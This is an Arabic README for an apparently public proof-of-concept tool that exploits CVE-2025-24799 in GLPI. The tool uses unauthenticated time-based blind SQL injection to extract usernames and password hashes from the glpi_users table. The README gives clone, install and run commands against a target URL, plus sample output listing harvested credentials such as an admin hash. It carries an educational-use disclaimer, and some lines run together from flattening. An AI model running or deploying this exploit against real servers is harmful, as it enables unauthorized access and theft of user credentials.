
يستغل ثغرة CVE-2025-24799 في GLPI عبر حقن SQL أعمى قائم على الوقت بدون مصادقة لاستخراج أسماء المستخدمين وتجزئات كلمات المرور من glpi_users لإجراء اختبارات أمنية مصرح بها.
CVE-2025-24799 هو استغلال إثبات المفهوم (PoC) يستهدف GLPI.
يُظهر هذا الاستغلال حقن SQL غير مصادَق عليه (أعمى قائم على الوقت) لاستخراج بيانات اعتماد المستخدمين.
إخلاء مسؤولية: هذا الاستغلال لأغراض تعليمية فقط. لا تستخدمه على أنظمة دون إذن.
glpi_users والأعمدة المطلوبة (name و password)git clone https://github.com/Rosemary1337/CVE-2025-24799.git
cd CVE-2025-24799
pip install -r requirements.txt
المتطلبات:
requests,colorama,beautifulsoup4
python3 main.py -u <TARGET_URL>
python3 main.py -u http://target.com/index.php/ajax
| Flag | الوصف | مطلوب | الافتراضي |
|---|---|---|---|
-u, --url | رابط الهدف | نعم | - |
تعرض وحدة التحكم:
[•][✔][✖][i]مثال:
[•] Exploiting CVE-2025-24799...
[✔] Table 'glpi_users' found.
[✔] Required columns verified.
[i] Starting credential extraction...
[+] Credential 1: admin:5f4dcc3b5aa765d61d8327deb882cf99
[+] Credential 2: user:123456
[*] Extraction complete.
أنا مطوّر نشط أستمتع ببناء الأدوات ومشاركة المعرفة. يمكنك التواصل معي عبر: